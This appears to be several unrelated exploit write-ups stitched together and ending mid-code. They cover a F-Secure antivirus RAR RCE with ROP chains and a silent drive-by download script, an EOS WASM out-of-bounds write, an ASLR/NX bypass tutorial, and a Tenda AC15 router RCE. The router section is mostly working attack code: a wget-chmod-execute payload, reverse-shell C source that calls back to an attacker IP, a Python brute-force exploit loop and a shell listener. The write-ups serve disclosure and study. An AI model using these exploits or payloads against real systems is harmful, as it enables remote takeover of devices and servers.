F-Secure Anti-Virus: Remote Code Execution via Solid RAR Unpacking

As I briefly mentioned in my last two posts about the 7-Zip bugs CVE-2017-17969, CVE-2018-5996, and CVE-2018-10115, the products of at least one antivirus vendor were affected by those bugs. Now that all patches have been rolled out, I can finally make the vendor’s name public: It is F-Secure with all of its Windows-based endpoint protection products (including consumer products such as F-Secure Anti-Virus as well as corporate products such as F-Secure Server Security).

Even though F-Secure products are directly affected by the mentioned 7-Zip bugs, exploitation is substantially more difficult than it was in 7-Zip (before version 18.05), because F-Secure properly deploys ASLR. In this post, I am presenting an extension to my previous 7-Zip exploit of CVE-2018-10115 that achieves Remote Code Execution on F-Secure products.

Introduction

In my previous 7-Zip exploit, I demonstrated how we can use 7-Zip’s methods for RAR header processing to massage the heap. This was not completely trivial, but after that, we were basically done. Since 7-Zip 18.01 came without ASLR, a completely static ROP chain was enough to obtain code execution.

With F-Secure deploying ASLR, such a static ROP chain cannot work anymore, and an additional idea is required. In particular, we need to compute the ROP chain dynamically. In a scriptable environment, this is usually quite easy: Simply leak a pointer to derive the base address of some module, and then just add this base address to the prepared ROP chain.

Since the bug we try to exploit resides within RAR extraction code, a promising idea could be to use the RarVM as a scripting environment to compute the ROP chain. I am quite confident that this would work, if only the RarVM were actually available. Unfortunately, it is not: Even though 7-Zip’s RAR implementation supports the RarVM, it is disabled by default at compile time, and F-Secure did not enabled it either.

While it is almost certain the F-Secure engine contains some attacker-controllable scripting engine (outside of the 7-Zip module), it seemed difficult to exploit something like this in a reliable manner. Moreover, my goal was to find an ASLR bypass that works independently of any F-Secure features. Ideally, the new exploit would also work for 7-Zip (with ASLR), as well as any other software that makes use of 7-Zip as a library.

In the following, I will briefly recap the most important aspects of the exploited bug. Then, we will see how to bypass ASLR in order to achieve code execution.

The Bug

The bug I am exploiting is explained in detail in my previous blog post. In essence, it is an uninitialized memory usage that allows us to control a large part of a RAR decoder’s state. In particular, we are going to use the Rar1 decoder. The method NCompress::NRar1::CDecoder::LongLZ1 contains the following code:

if (AvrPlcB > 0x28ff) { distancePlace = DecodeNum(PosHf2); }
else if (AvrPlcB > 0x6ff) { distancePlace = DecodeNum(PosHf1); }
else { distancePlace = DecodeNum(PosHf0); }
// some code omitted
for (;;) {
  dist = ChSetB[distancePlace & 0xff];
  newDistancePlace = NToPlB[dist++ & 0xff]++;
  if (!(dist & 0xff)) { CorrHuff(ChSetB,NToPlB); }
  else { break; }
}

ChSetB[distancePlace] = ChSetB[newDistancePlace];
ChSetB[newDistancePlace] = dist;

This is very useful, because the uint32_t arrays ChSetB and NtoPlB are fully attacker controlled (since they are not initialized if we trigger this bug). Hence, newDistancePlace is an attacker-controlled uint32_t, and so is dist (with the restriction that the least significant byte cannot be 0xff). Moreover, distancePlace is determined by the input stream, so it is attacker-controlled as well.

So this gives us a pretty good read-write primitive. Note, however, that it has a few restrictions. In particular, the executed operation is basically a swap. We can use the primitive to do the following:

  • We can read arbitrary uint32_t values from 4-byte aligned 32-bit offsets starting from &ChSetB[0] into the ChSetB array. If we do this, we always overwrite the value we just read (since it is a swap).
  • We can write uint32_t values from the ChSetB array to arbitrary 4-byte aligned 32-bit offsets starting from &ChSetB[0]. Those values can be either constants, or values that we have read before into the ChSetB array. In any case, the least significant byte must not be 0xff. Furthermore, since we are swapping values, a written value is always destroyed (within the ChSetB array) and cannot be written a second time.

Lastly, note that the way the index newDistancePlace is determined restricts us further. First, we cannot do too many of such read/write operations, since the array NToPlB has only 256 elements. Second, if we are writing a value that is unknown in advance (say, a part of an address subject to ASLR), we might not know exactly what dist & 0xff is, so we need to fill (possibly many) different entries in the NToPlB with the desired index.

It is clear that this basic read-write primitive for itself is not enough to bypass ASLR. An additional idea is required.

Exploitation Strategy

We make use of roughly the same exploitation strategy as in the 7-Zip exploit:

  1. Place a Rar3 decoder object in constant distance after the Rar1 decoder containing the read-write primitive.
  2. Use the Rar3 decoder to extract the payload into the _window buffer.
  3. Use the read-write primitive to swap the Rar3 decoder’s vtable pointer with the _window pointer.

Recall that in the 7-Zip exploit, the payload we extracted in step 2 contained a stack pivot, the (static) ROP chain, and the shellcode. Obviously, such a static ROP chain cannot work in an environment with full ASLR. So how do we dynamically extract a valid ROP chain into the buffer without knowing any address in advance?

Bypassing ASLR

We are in a non-scriptable environment, but we still want to correct our ROP chain by a randomized offset. Specifically, we would like to add 64-bit integers.

Well, we might not need a full 64-bit addition. The ability to adjust an address by overwriting the least significant bytes of it could suffice. Note, however, that this does not work in general. Consider &f being a randomized address to some function. If the address was a completely uniform random 64-bit value, and we would just overwrite the least significant byte, then we would not know by how much we changed the address. However, the idea works if we know nothing about the address, except for the d least significant bytes. In this case, we can safely overwrite the d least significant bytes, and we will always know by how much we changed the address. Luckily2, Windows loads every module at a (randomized) 64K aligned address. This means, that the two least significant bytes of any code address will be constant.

Why is this idea useful in our case? As you might know, RAR is strongly based on Lempel–Ziv compression algorithms. In these algorithms, the coder builds a dynamic dictionary, which contains sequences of bytes that occurred earlier in the compressed stream. If a byte sequence is repeating itself, then it can be encoded efficiently as a reference to the corresponding entry in the dictionary.

In RAR, the concept of a dynamic dictionary occurs in a generalized form. In fact, on an abstract level, the decoder executes in every step one of the following two operations:

  1. PutByte(bytevalue), or
  2. CopyBlock(distance,num)

The operation CopyBlock copies num bytes, starting from distance bytes before the current position of the window buffer. This gives rise to the following idea:

  1. Use the read-write primitive to write a function pointer to the end of our Rar3 window buffer. This function pointer is the 8-byte address &7z.dll+c for some (known) constant c.
  2. The base address &7z.dll is strongly randomized, but it is always 64K aligned. Hence, we can make use of the idea explained at the beginning of this section: First, we write two arbitrary bytes of our choice (using two invocations of PutByte(b)). Then, we copy (by using a CopyBlock(d,n) operation) the six most significant bytes of the function pointer &7z.dll+c from the end of the window buffer. Together, they form eight bytes, a valid address, pointing to executable code.

Note that we are copying from the end of the window buffer. It turns out that this works in general, because the source index (currentpos - 1) - distance is computed modulo the size of the window. However, the 7-Zip implementation actually checks whether we copy from a distance greater than the current position and aborts if this is the case. Fortunately, it is possible to bypass this check by corrupting a member variable of the Rar3 decoder with the read-write primitive. I leave it as an (easy) exercise for the interested reader to figure out which variable this is and why this works.

ROP

The technique outlined in the previous section allows us to write a ROP chain that consists of addresses within a single 64K region of code. Does this suffice? Let’s see. We try to write the following ROP chain:

// pivot stack: xchg rax, rsp;
exec_buffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec_buffer, rsp+shellcode_offset, 0x1000);
jmp exec_buffer;

The crucial step of the chain is to call VirtualAlloc. All occurrences of jmp cs:VirtualAlloc I could find within F-Secure’s 7z.dll where at offsets of the form +0xd****. Unfortunately, I could not find an easy way to retrieve a pointer of this form within (or near) the Rar decoder objects. Instead, I could find a pointer of the form +0xc****, and used the following technique to turn it into a pointer of the form +0xd****:

  1. Use the read-write primitive to swap the largest available pointer of the form +0xc**** into the member variable LCount of the Rar1 decoder.
  2. Let the Rar1 decoder process a carefully crafted item, such that the member variable LCount is incremented (with a stepsize of one) until it has the form +0xd****.
  3. Use the read-write primitive to swap the member variable LCount into the end of the Rar3 decoder’s window buffer (see previous section).

As it turns out, the largest available pointer of the form +0xc**** is roughly +0xcd000, so we only need to increase it by 0x3000.

Being able to address a full 64K code region containing a jump to VirtualAlloc, I hoped that a ROP chain of the above form would be easy to achieve. Unfortunately, I simply could not do it, so I copied a second pointer to the window buffer. Two regions of 64K code, so 128K in total, were enough to obtain the desired ROP chain. It is still far from being nice, though. For example, this is how the stack pivot looks like:

0xd335c # push rax; cmp eax, 0x8b480002; or byte ptr [r8 - 0x77], cl; cmp bh, bh; adc byte ptr [r8 - 0x75], cl; pop rsp; and al, 0x48; mov rbp, qword ptr [rsp + 0x50]; mov rsi, qword ptr [rsp + 0x58]; add rsp, 0x30; pop rdi; ret;

Another example is how we set the register R9 to PAGE_EXECUTE_READWRITE (0x40) before calling VirtualAlloc:

# r9 := r9 >> 9
0xd6e75, # pop rcx; sbb al, 0x5f; ret;
0x9, # value popped into rcx
0xcdb4d, # shr r9d, cl; mov ecx, r10d; shl edi, cl; lea eax, dword ptr [rdi - 1]; mov rdi, qword ptr [rsp + 0x18]; and eax, r9d; or eax, esi; mov rsi, qword ptr [rsp + 0x10]; ret; 

This works, because R9 always has the value 0x8000 when we enter the ROP chain.

Wrapping up

We have seen a sketch of the basic exploitation idea. When actually implementing it, one has to overcome quite a few additional obstacles I have ignored to avoid boring you too much. Roughly speaking, the basic implementation steps are as follows:

  1. Use (roughly) the same heap massaging technique as in the 7-Zip exploit.
  2. Implement a basic Rar1 encoder to create a Rar1 item that controls the read-write primitive in the desired way.
  3. Implement a basic Rar3 encoder to create a Rar3 item that writes the ROP chain as well as the shellcode into the window buffer.

Finally, all items (even of different Rar versions) can be merged into a single archive, which leads to code execution when it is extracted.

Minimizing Required User Interaction

Virtually all antivirus products come with a so-called file system minifilter, which intercepts every file system access and triggers the engine to run background scans. F-Secure’s products do this as well. However, such automatic background scans do not extract compressed files. This means that it is not enough to send a victim a malicious RAR archive via e-mail. If one did this, it would be necessary for the victim to trigger a scan manually.

Obviously, this is still extremely bad, since the very purpose of antivirus software is to scan untrusted files. Yet, we can do better. It turns out that F-Secure’s products intercept HTTP traffic and automatically scan files received over HTTP if they are at most 5MB in size. This automatic scan includes (by default) the extraction of compressed files. Hence, we can deliver our victim a web page that automatically downloads the exploit file. In order to do this silently (preventing the user even from noticing that a download is triggered), we can issue an asynchronous HTTP request as follows:

<script>
  var xhr = new XMLHttpRequest(); 
  xhr.open('GET', '/exploit.rar', true); 
  xhr.responseType = 'blob';
  xhr.send(null);
</script>

Demo

The following demo video briefly presents the exploit running on a freshly installed and fully updated Windows 10 RS4 64-bit (Build 17134.81) with F-Secure Anti-Virus (also fully updated, but 7z.dll has been replaced with the unpatched version, which I have extracted from an F-Secure installation on April 15, 2018).

As you can see, the engine (fshoster64.exe) runs as NT AUTHORITY\SYSTEM, and the exploit causes it to start notepad.exe (also as NT AUTHORITY\SYSTEM).

Maybe you are asking yourself now why the shellcode starts notepad.exe instead of the good old calc.exe. Well, I tried to open calc.exe as NT AUTHORITY\SYSTEM, but it did not work. This has nothing to do with the exploit or the shellcode itself. It seems that it just does not work anymore with the new UWP calculator (it also fails to start when using psexec64.exe -i -s).

Conclusion

We have seen how an uninitialized memory usage bug can be exploited for arbitrary remote code execution as NT AUTHORITY\SYSTEM with minimal user interaction.

Apart from discussing the bugs and possible solutions with F-Secure, I have proposed three mitigation measures to harden their products:

  1. Sandbox the engine and make sure most of the code does not run under such high privileges.
  2. Stop snooping into HTTP traffic. This feature is useless anyway. It literally does not provide any security benefit whatsoever, since evading it requires the attacker only to switch from HTTP to HTTPS (F-Secure does not snoop into HTTPS traffic – thank God!). Hence, this feature only increases the attack surface of their products.
  3. Enable modern Windows exploitation mitigations such as CFG and ACG.

Finally, I want to remark that the presented exploitation technique is independent of any F-Secure features. It works on any product that uses the 7-Zip library to extract compressed RAR files, even if ASLR and DEP are enabled. For example, it is likely that Malwarebytes was affected3 as well.

 

Timeline of Disclosure

  • 2018-03-06 — Discovery of the bug in 7-Zip and F-Secure products (no reliably crashing PoC for F-Secure yet).
  • 2018-03-06 — Report to 7-Zip developer Igor Pavlov.
  • 2018-03-11 — Report to F-Secure (with reliably crashing PoC).
  • 2018-04-14 — MITRE assigned CVE-2018-10115 to the bug (for 7-Zip).
  • 2018-04-15 — Additional report to F-Secure that this was a highly critical vulnerability, and that I had a working code execution exploit for 7-Zip (only an ALSR bypass missing to attack F-Secure products). Proposed a detailed patch to F-Secure, and strongly recommended to roll out a fix without waiting for the upcoming 7-Zip update.
  • 2018-04-30 — 7-Zip 18.05 released, fixing CVE-2018-10115.
  • 2018-05-22 — F-Secure fix release via automatic update channel.
  • 2018-05-23 — Additional report to F-Secure with a full PoC for Remote Code Execution on various F-Secure products.
  • 2018-06-01 — Release of F-Secure advisory.
  • 2018-??-?? — Bug bounty paid.

EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds

Vulnerability Description

EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds
EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds

We found and successfully exploit a buffer out-of-bounds write vulnerability in EOS when parsing a WASM file.

To use this vulnerability, attacker could upload a malicious smart contract to the nodes server, after the contract get parsed by nodes server, the malicious payload could execute on the server and taken control of it.

After taken control of the nodes server, attacker could then pack the malicious contract into new block and further control all nodes of the EOS network.

Vulnerability Reporting Timeline

2018-5-11                  EOS Out-of-bound Write Vulnerability Found

2018-5-28                Full Exploit Demo of Compromise EOS Super Node Completed

2018-5-28                Vulnerability Details Reported to Vendor

2018-5-29                 Vendor Fixed the Vulnerability on Github and Closed the Issue

2018-5-29                   Notices the Vendor the Fixing is not complete

Some Telegram chats with Daniel Larimer:

We trying to report the bug to him.

He said they will not ship the EOS without fixing, and ask us send the report privately since some people are running public test nets

 +1,699,900 470,700 2,098,300 Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

He provided his mailbox and we send the report to him

 +1,699,900 470,700 2,098,300 Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

He provided his mailbox and we send the report to him

EOS fixed the vulnerability and Daniel would give the acknowledgement.

RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

Technical Detail of the Vulnerability  

This is a buffer out-of-bounds write vulnerability

At libraries/chain/webassembly/binaryen.cpp (Line 78),Function binaryen_runtime::instantiate_module:

for (auto& segment : module->table.segments) {
Address offset = ConstantExpressionRunner<TrivialGlobalManager>(globals).visit(segment.offset).value.geti32();
assert(offset + segment.data.size() <= module->table.initial);
for (size_t i = 0; i != segment.data.size(); ++i) {
table[offset + i] = segment.data[i]; <= OOB write here !
}
}

Here table is a std::vector contains the Names in the function table. When storing elements into the table, the |offset| filed is not correctly checked. Note there is a assert before setting the value, which checks the offset, however unfortunately, |assert| only works in Debug build and does not work in a Release build.

The table is initialized earlier in the statement:

table.resize(module->table.initial);

Here |module->table.initial| is read from the function table declaration section in the WASM file and the valid value for this field is 0 ~ 1024.

The |offset| filed is also read from the WASM file, in the data section, it is a signed 32-bits value.

So basically with this vulnerability we can write to a fairly wide range after the table vector’s memory.

How to reproduce the vulnerability

  1. Build the release version of latest EOS code

./eosio-build.sh

  1. Start EOS node, finish all the necessary settings described at:

https://github.com/EOSIO/eos/wiki/Tutorial-Getting-Started-With-Contracts

  1. Set a vulnerable contract:

We have provided a proof of concept WASM to demonstrate a crash.

In our PoC, we simply set the |offset| field to 0xffffffff so it can crash immediately when the out of bound write occurs.

To test the PoC:
cd poc
cleos set contract eosio ../poc -p eosio

If everything is OK, you will see nodeos process gets segment fault.

The crash info:

(gdb) c

Continuing.

Program received signal SIGSEGV, Segmentation fault.

0x0000000000a32f7c in eosio::chain::webassembly::binaryen::binaryen_runtime::instantiate_module(char const*, unsigned long, std::vector<unsigned char, std::allocator<unsigned char> >) ()

(gdb) x/i $pc

=> 0xa32f7c <_ZN5eosio5chain11webassembly8binaryen16binaryen_runtime18instantiate_moduleEPKcmSt6vectorIhSaIhEE+2972>:   mov    %rcx,(%rdx,%rax,1)

(gdb) p $rdx

$1 = 59699184

(gdb) p $rax

$2 = 34359738360

Here |rdx| points to the start of the |table| vector,

And |rax| is 0x7FFFFFFF8, which holds the value of |offset| * 8.

Exploit the vulnerability to achieve Remote Code Execution

This vulnerability could be leveraged to achieve remote code execution in the nodeos process, by uploading malicious contracts to the victim node and letting the node parse the malicious contract. In a real attack, the attacker may publishes a malicious contract to the EOS main network.

The malicious contract is first parsed by the EOS super node, then the vulnerability was triggered and the attacker controls the EOS super node which parsed the contract.

The attacker can steal the private key of super nodes or control content of new blocks. What’s more, attackers can pack the malicious contract into a new block and publish it. As a result, all the full nodes in the entire network will be controlled by the attacker.

We have finished a proof-of-concept exploit, and tested on the nodeos build on 64-bits Ubuntu system. The exploit works like this:

  1. The attacker uploads malicious contracts to the nodeos server.
  2. The server nodeos process parses the malicious contracts, which triggers the vulnerability.
  3. With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance. And with the help of our malicious WASM code, we finally achieves arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS.
  4. Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker.

You can refer to the video we provided to get some idea about what the exploit looks like, We may provide the full exploit chain later.

The Fixing of Vulnerability

Bytemaster on EOS’s github opened issue 3498 for the vulnerability that we reported:

And fixed the related code

But as the comment made by Yuki on the commit, the fixing is still have problem on 32-bits process and not so prefect.

Bypass ASLR+NX Part 1

Hi guys today i will explain how to bypass ASLR and NX mitigation technique if you dont have any knowledge about ASLR and NX you can read it in Above link i will explain it but not in depth

ASLR:Address Space Layout randomization : it’s mitigation to technique to prevent exploitation of memory by make Address randomize not fixed as we saw in basic buffer overflow exploit it need to but start of buffer in EIP and Redirect execution to execute your shellcode but when it’s random it will make it hard to guess that start of buffer random it’s only in shared library address we found ASLR in stack address ,Heap Address.

NX: Non-Executable it;s another mitigation use to prevent memory from execute any machine code(shellcode) as we saw in basic buffer overflow  you  put shellcode in stack and redirect EIP to begin of buffer to execute it but this will not work here this mitigation could be bypass by Ret2libc exploit technique use function inside binary pass it to stack and aslo they are another way   depend on gadgets inside binary or shared library this technique is ROP Return Oriented Programming i will  make separate article .

After we get little info about ASLR and NX now it’s time to see how we can bypass it, to bypass ASLR there are many ways like Ret2PLT use Procedural Linkage Table contains a stub code for each global function. A call instruction in text segment doesnt call the function (‘function’) directly instead it calls the stub code(func@PLT) why we use Return in PLT because it’not randomized  it’s address know before execution itself  another technique is overwrite GOT and  brute-forcing this technique use when the address partial randomized like 2 or 3 bytes just randomized .

in this article i will explain technique combine Ret2plt and some ROP gadgets and Ret2libc see let divided it
first find Ret2PLT

vulnerable code

we compile it with following Flags

now let check ASLR it’s enable it

 

as you see in above image libc it’s randomized but it could be brute-force it

now let open file in gdb

now it’s clear NX was enable it now let fuzzing binary .

we create pattern and we going to pass to  binary  to detect where overflow occur

 

 

now we can see they are pattern in EIP we use another tool to find where overflow occurred.

1028 to overwrite EBP if we add 4bytes we going control EIP and we can redirect our execution.

 

now we have control EIP .

ok after we do basic overflow steps now we need way let us to bypass ASLR+NX .

first find functions PLT in binary file.

we find strcpy and system PLT now how we going to build our exploit depend on two methods just.
second we must find writable section in binary file to fill it and use system like to we did in traditional Ret2libc.

first think in .bss section is use by compilers and linkers for the  part  of the data segment containing static allocated variables that are not initialized .

after that we will use strcpy to write string in .bss address but what address ?
ok let back to function we find it in PLT strcpy as we know we will be use to write string and system to execute command but will can;t find /bin/sh in binary file we have another way is to look at binary.

now we have string address  it’s time to combine all pieces we found it.

1-use strcpy to copy from SRC to DEST SRC in this case it’s our string «sh» and DEST   it’s our writable area «.bss» but we need to chain two method strcpy and system we look for gadgets depend on our parameters in this case just we need pop pop ret.

we chose 0x080484ba does’t matter  register name  we need just two pop .
2-after we write string  we use system like we use it in Ret2libc but in this case «/bin/sh» will be .bss address.

final payload

strcpy+ppr+.bss+s
strcpy+ppr+.bss+1+h
system+dump+.bss

Final Exploit

 

we got Shell somtime you need to chain many technique to get final exploit to bypass more than one mitigation.

REMOTE CODE EXECUTION ROP,NX,ASLR (CVE-2018-5767) Tenda’s AC15 router

INTRODUCTION (CVE-2018-5767)

In this post we will be presenting a pre-authenticated remote code execution vulnerability present in Tenda’s AC15 router. We start by analysing the vulnerability, before moving on to our regular pattern of exploit development – identifying problems and then fixing those in turn to develop a working exploit.

N.B – Numerous attempts were made to contact the vendor with no success. Due to the nature of the vulnerability, offset’s have been redacted from the post to prevent point and click exploitation.

LAYING THE GROUNDWORK

The vulnerability in question is caused by a buffer overflow due to unsanitised user input being passed directly to a call to sscanf. The figure below shows the vulnerable code in the R7WebsSecurityHandler function of the HTTPD binary for the device.

Note that the “password=” parameter is part of the Cookie header. We see that the code uses strstr to find this field, and then copies everything after the equals size (excluding a ‘;’ character – important for later) into a fixed size stack buffer.

If we send a large enough password value we can crash the server, in the following picture we have attached to the process using a cross compiled Gdbserver binary, we can access the device using telnet (a story for another post).

This crash isn’t exactly ideal. We can see that it’s due to an invalid read attempting to load a byte from R3 which points to 0x41414141. From our analysis this was identified as occurring in a shared library and instead of looking for ways to exploit it, we turned our focus back on the vulnerable function to try and determine what was happening after the overflow.

In the next figure we see the issue; if the string copied into the buffer contains “.gif”, then the function returns immediately without further processing. The code isn’t looking for “.gif” in the password, but in the user controlled buffer for the whole request. Avoiding further processing of a overflown buffer and returning immediately is exactly what we want (loc_2f7ac simply jumps to the function epilogue).

Appending “.gif” to the end of a long password string of “A”‘s gives us a segfault with PC=0x41414141. With the ability to reliably control the flow of execution we can now outline the problems we must address, and therefore begin to solve them – and so at the same time, develop a working exploit.

To begin with, the following information is available about the binary:

file httpd
format elf
type EXEC (Executable file)
arch arm
bintype elf
bits 32
canary false
endian little
intrp /lib/ld-uClibc.so.0
machine ARM
nx true
pic false
relocs false
relro no
static false

I’ve only included the most important details – mainly, the binary is a 32bit ARMEL executable, dynamically linked with NX being the only exploit mitigation enabled (note that the system has randomize_va_space = 1, which we’ll have to deal with). Therefore, we have the following problems to address:

  1. Gain reliable control of PC through offset of controllable buffer.
  2. Bypass No Execute (NX, the stack is not executable).
  3. Bypass Address space layout randomisation (randomize_va_space = 1).
  4. Chain it all together into a full exploit.

PROBLEM SOLVING 101

The first problem to solve is a general one when it comes to exploiting memory corruption vulnerabilities such as this –  identifying the offset within the buffer at which we can control certain registers. We solve this problem using Metasploit’s pattern create and pattern offset scripts. We identify the correct offset and show reliable control of the PC register:

With problem 1 solved, our next task involves bypassing No Execute. No Execute (NX or DEP) simply prevents us from executing shellcode on the stack. It ensures that there are no writeable and executable pages of memory. NX has been around for a while so we won’t go into great detail about how it works or its bypasses, all we need is some ROP magic.

We make use of the “Return to Zero Protection” (ret2zp) method [1]. The problem with building a ROP chain for the ARM architecture is down to the fact that function arguments are passed through the R0-R3 registers, as opposed to the stack for Intel x86. To bypass NX on an x86 processor we would simply carry out a ret2libc attack, whereby we store the address of libc’s system function at the correct offset, and then a null terminated string at offset+4 for the command we wish to run:

To perform a similar attack on our current target, we need to pass the address of our command through R0, and then need some way of jumping to the system function. The sort of gadget we need for this is a mov instruction whereby the stack pointer is moved into R0. This gives us the following layout:

We identify such a gadget in the libc shared library, however, the gadget performs the following instructions.

mov sp, r0
blx r3

This means that before jumping to this gadget, we must have the address of system in R3. To solve this problem, we simply locate a gadget that allows us to mov or pop values from the stack into R3, and we identify such a gadget again in the libc library:

pop {r3,r4,r7,pc}

This gadget has the added benefit of jumping to SP+12, our buffer should therefore look as such:

Note the ‘;.gif’ string at the end of the buffer, recall that the call to sscanf stops at a ‘;’ character, whilst the ‘.gif’ string will allow us to cleanly exit the function. With the following Python code, we have essentially bypassed NX with two gadgets:

libc_base = ****
curr_libc = libc_base + (0x7c &lt;&lt; 12)
system = struct.pack(«&lt;I», curr_libc + ****)
#: pop {r3, r4, r7, pc}
pop = struct.pack(«&lt;I», curr_libc + ****)
#: mov r0, sp ; blx r3
mv_r0_sp = struct.pack(«&lt;I», curr_libc + ****)
password = «A»*offset
password += pop + system + «B»*8 + mv_r0_sp + command + «.gif»

With problem 2 solved, we now move onto our third problem; bypassing ASLR. Address space layout randomisation can be very difficult to bypass when we are attacking network based applications, this is generally due to the fact that we need some form of information leak. Although it is not enabled on the binary itself, the shared library addresses all load at different addresses on each execution. One method to generate an information leak would be to use “native” gadgets present in the HTTPD binary (which does not have ASLR) and ROP into the leak. The problem here however is that each gadget contains a null byte, and so we can only use 1. If we look at how random the randomisation really is, we see that actually the library addresses (specifically libc which contains our gadgets) only differ by one byte on each execution. For example, on one run libc’s base may be located at 0xXXXXXXXX, and on the next run it is at 0xXXXXXXXX

. We could theoretically guess this value, and we would have a small chance of guessing correct.

This is where our faithful watchdog process comes in. One process running on this device is responsible for restarting services that have crashed, so every time the HTTPD process segfaults, it is immediately restarted, pretty handy for us. This is enough for us to do some naïve brute forcing, using the following process:

With NX and ASLR successfully bypassed, we now need to put this all together (problem 3). This however, provides us with another set of problems to solve:

  1. How do we detect the exploit has been successful?
  2. How do we use this exploit to run arbitrary code on the device?

We start by solving problem 2, which in turn will help us solve problem 1. There are a few steps involved with running arbitrary code on the device. Firstly, we can make use of tools on the device to download arbitrary scripts or binaries, for example, the following command string will download a file from a remote server over HTTP, change its permissions to executable and then run it:

command = «wget http://192.168.0.104/malware -O /tmp/malware &amp;&amp; chmod 777 /tmp/malware &amp;&amp; /tmp/malware &amp;;»

The “malware” binary should give some indication that the device has been exploited remotely, to achieve this, we write a simple TCP connect back program. This program will create a connection back to our attacking system, and duplicate the stdin and stdout file descriptors – it’s just a simple reverse shell.

#include <sys/socket.h>

#include <sys/types.h>

#include <string.h>

#include <stdio.h>

#include <netinet/in.h>

int main(int argc, char **argv)

{

struct sockaddr_in addr;

socklen_t addrlen;

int sock = socket(AF_INET, SOCK_STREAM, 0);

memset(&addr, 0x00, sizeof(addr));

addr.sin_family = AF_INET;

addr.sin_port = htons(31337);

addr.sin_addr.s_addr = inet_addr(“192.168.0.104”);

int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));

dup2(sock, 0);

dup2(sock, 1);

dup2(sock, 2);

system(“/bin/sh”);

}

We need to cross compile this code into an ARM binary, to do this, we use a prebuilt toolchain downloaded from Uclibc. We also want to automate the entire process of this exploit, as such, we use the following code to handle compiling the malicious code (with a dynamically configurable IP address). We then use a subprocess to compile the code (with the user defined port and IP), and serve it over HTTP using Python’s SimpleHTTPServer module.

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

#write the code with ip and port to a.c

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

#wait for the process to terminate so we can get its return code

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

This code will allow us to utilise the wget tool present on the device to fetch our binary and run it, this in turn will allow us to solve problem 1. We can identify if the exploit has been successful by waiting for connections back. The abstract diagram in the next figure shows how we can make use of a few threads with a global flag to solve problem 1 given the solution to problem 2.

The functions shown in the following code take care of these processes:

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777

/tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base address each time

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d”%i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the process.

time.sleep(1)

 

print “[+] Exploit done”

Finally, we put all of this together by spawning the individual threads, as well as getting command line options as usual:

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”,

help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”,

help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”,

help=”path to arm cross compiler”)

